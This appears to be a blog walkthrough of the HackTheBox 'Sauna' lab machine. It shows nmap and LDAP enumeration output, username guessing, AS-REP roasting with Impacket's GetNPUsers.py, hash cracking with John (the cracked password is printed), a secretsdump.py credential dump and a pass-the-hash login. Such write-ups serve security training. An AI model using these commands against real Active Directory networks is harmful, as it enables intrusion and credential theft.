Press "Enter" to skip to content

HackTheBox – Sauna Walkthrough

Hack the Box Sauna Walk Through

Summary:

Sauna is an Easy Machine from HackTheBox which is based on Active Directory. We would be using various tools for exploitation such as Python Collection Impacket and Evil WinRM. The Initial Foothold of this box is CTF type but is a very straightforward box.

Enumeration:

Let’s Start with Enumeration of the Target with Nmap scanning all ports.

root@rootsploit# nmap -Pn -n -p- -vv -oA nmap/Full-Scan 10.10.10.175
Nmap scan report for 10.10.10.175                                                                                                                                                                                                          
Host is up, received user-set (0.31s latency).                                                                                                                                                                                             
Scanned at 2020-07-16 12:32:34 EDT for 1683s                                                                                                                                                                                               
Not shown: 65515 filtered ports                                                                                                                                                                                                            
Reason: 65515 no-responses                                                                                                                                                                                                                 
PORT      STATE SERVICE          REASON                                                                                                                                                                                                    
53/tcp    open  domain           syn-ack                                                                                                                                                                                                   
80/tcp    open  http             syn-ack                                                                                                                                                                                                   
88/tcp    open  kerberos-sec     syn-ack                                                                                                                                                                                                   
135/tcp   open  msrpc            syn-ack                                                                                                                                                                                                   
139/tcp   open  netbios-ssn      syn-ack                                                                                                                                                                                                   
389/tcp   open  ldap             syn-ack                                                                                                                                                                                                   
445/tcp   open  microsoft-ds     syn-ack                                                                                                                                                                                                   
464/tcp   open  kpasswd5         syn-ack                                                                                                                                                                                                   
593/tcp   open  http-rpc-epmap   syn-ack                                                                                                                                                                                                   
636/tcp   open  ldapssl          syn-ack                                                                                                                                                                                                   
3268/tcp  open  globalcatLDAP    syn-ack                                                                                                                                                                                                   
3269/tcp  open  globalcatLDAPssl syn-ack                                                                                                                                                                                                   
5985/tcp  open  wsman            syn-ack                                                                                                                                                                                                   
9389/tcp  open  adws             syn-ack
49667/tcp open  unknown          syn-ack
49673/tcp open  unknown          syn-ack
49674/tcp open  unknown          syn-ack
49675/tcp open  unknown          syn-ack
49686/tcp open  unknown          syn-ack
49694/tcp open  unknown          syn-ack

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Enumerate Common Ports such as LDAP:

root@rootsploit# nmap -Pn -n -sV -p3268 --script ldap-search -oA nmap/ldap-search 10.10.10.175
Nmap scan report for 10.10.10.175
Host is up (0.34s latency).

PORT     STATE SERVICE VERSION
3268/tcp open  ldap    Microsoft Windows Active Directory LDAP (Domain: EGOTISTICAL-BANK.LOCAL0., Site: Default-First-Site-Name)
| ldap-search: 
|   Context: DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectClass: top
|         objectClass: domain
|         objectClass: domainDNS
|         distinguishedName: DC=EGOTISTICAL-BANK,DC=LOCAL
|         instanceType: 5
|         whenCreated: 2020/01/23 05:44:25 UTC
|         whenChanged: 2020/07/16 23:21:50 UTC
|         subRefs: DC=ForestDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: DC=DomainDnsZones,DC=EGOTISTICAL-BANK,DC=LOCAL
|         subRefs: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         uSNCreated: 4099
|         uSNChanged: 57366
|         name: EGOTISTICAL-BANK
|         objectGUID: 504e6ec-c122-a143-93c0-cf487f83363
|         replUpToDateVector: \x02\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xAB\x8C\xEFx\xD1I\x85D\xB2\xC2\xED\x9Ce\xFE\xAF\xAD\x0C\xE0\x00\x00\x00\x00\x00\x00\x0Cr!\x15\x03\x00\x00\x00\xFDZ\x85\x92F\xDE^A\xAAVnj@#\xF6\x0C\x0B\xD0\x00\x00\x00\x00\x00\x00\xD0\xF0
|         \x15\x03\x00\x00\x00@\xBE\xE0\xB3\xC6%\xECD\xB2\xB9\x9F\xF8\D\xB2\xEC \xB0\x00\x00\x00\x00\x00\x00\xD4\x04R\x14\x03\x00\x00\x00
|         objectSid: 1-5-21-2966785786-3096785034-1186376766
|         wellKnownObjects: B:32:6227F0AF1FC2410D8E3BB10615BB5B0F:CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:F4BE92A4C777485E878E9421D53087DB:CN=Microsoft,CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:09460C08AE1E4A4EA0F64AEE7DAA1E5A:CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:22B70C67D56E4EFB91E9300FCA3DC1AA:CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:18E2EA80684F11D2B9AA00C04F79F805:CN=Deleted Objects,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:2FBAC1870ADE11D297C400C04FD8D5CD:CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB8153B7768811D1ADED00C04FD8D5CD:CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AB1D30F3768811D1ADED00C04FD8D5CD:CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A361B2FFFFD211D1AA4B00C04FD7D83A:OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:AA312825768811D1ADED00C04FD8D5CD:CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|         wellKnownObjects: B:32:A9D1CA15768811D1ADED00C04FD8D5CD:CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|         objectCategory: CN=Domain-DNS,CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         gPLink: [LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL;0]
|         dSCorePropagationData: 1601/01/01 00:00:00 UTC
|         masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDs-masteredBy: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         msDS-IsDomainFor: CN=NTDS Settings,CN=SAUNA,CN=Servers,CN=Default-First-Site-Name,CN=Sites,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|         dc: EGOTISTICAL-BANK
|     dn: CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Computers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: OU=Domain Controllers,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=System,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=LostAndFound,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Infrastructure,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=ForeignSecurityPrincipals,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Program Data,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=NTDS Quotas,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Managed Service Accounts,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Keys,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Schema,CN=Configuration,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=TPM Devices,DC=EGOTISTICAL-BANK,DC=LOCAL
|     dn: CN=Builtin,DC=EGOTISTICAL-BANK,DC=LOCAL
|_    dn: CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
Service Info: Host: SAUNA; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

From the above scan results you can know Domain Name is EGOTISTICAL-BANK.LOCAL and Hugo Smith might be a user belonging to the Active Directory.

Further observing the hosted Web Server on port 80 we can see the below page.

Egotistical Bank Page

After navigating to About Us page we can find list of team members which we can gather for maximizing our attack surface.

Users Found from Website
Users for EGOTISTICAL-BANK

Initial Foothold:

Since this is an Active Directory Environment we can use basic naming conventions to create a list of username based on Full Name of Users.Upon finding reference on most commonly used that is firstname.lastname and first character of firstname and lastname.

For Eg: John Smith can be john.smith and jsmith

hugo.smith
fergus.smith
hugo.bear
steven.kerb
shaun.coins
bowie.taylor
sophie.driver
hsmith
fsmith
hbear
skerb
scoins
btaylor
sdriver

Now we can pass these usernames with a Impacket tool called GetNPUsers.py

GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt -outputfile hash.txt -dc-ip 10.10.10.175
GetNPUsers.py to dump user hashes
GetNPUsers.py Output

Let’s Check out hash output file

Cracking the kerberos hash
Hashes Gathered for user fsmith

Lets crack the it with JohnTheRipper

root@rootsploit#john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Thestrokes23     (?)
1g 0:00:00:20 DONE (2020-07-17 01:39) 0.04960g/s 522768p/s 522768c/s 522768C/s Thing..Thehunter22
Use the "--show" option to display all of the cracked passwords reliably
Session completed

Lets login to the target with Evil WinRM as fsmith.

Got user.txt using fsmith user
Flag user.txt found

Now Let’s Enumerating the target for Privilege Escalation with WinPeas by uploading it from local system and we found credentials to svc_loanmanager stored in a Registry.

User credentials found in windows registry

Enumerate users we observe that svc_loanmgr account was never logged in. It might be possible that its a service account which Authenticates based on tickets with the help of TGS lets find out.

svc_loanmgr account information

After trying the credentials for all the services such as RPCClient, SMB, WinRM target it didn’t work. Lets try dumping hashes for users with Impacket Tool secretsdump.py

Using Secrets.py to Fetch Admin Hashes

Now we can perform PassTheHash attack by passing Administrator Hash and login with Evil WinRM.

Root.txt file with Admin Account

And here we have Pwned Sauna.

Sauna Pwned by RootSploit
Pwn3d

Thanks for reading follow @Rootsploit for more awesome blogs.

References:

https://github.com/SecureAuthCorp/impacket/

https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite

One Comment

  1. Tg Tg July 19, 2020

    👍

Leave a Reply

Your email address will not be published. Required fields are marked *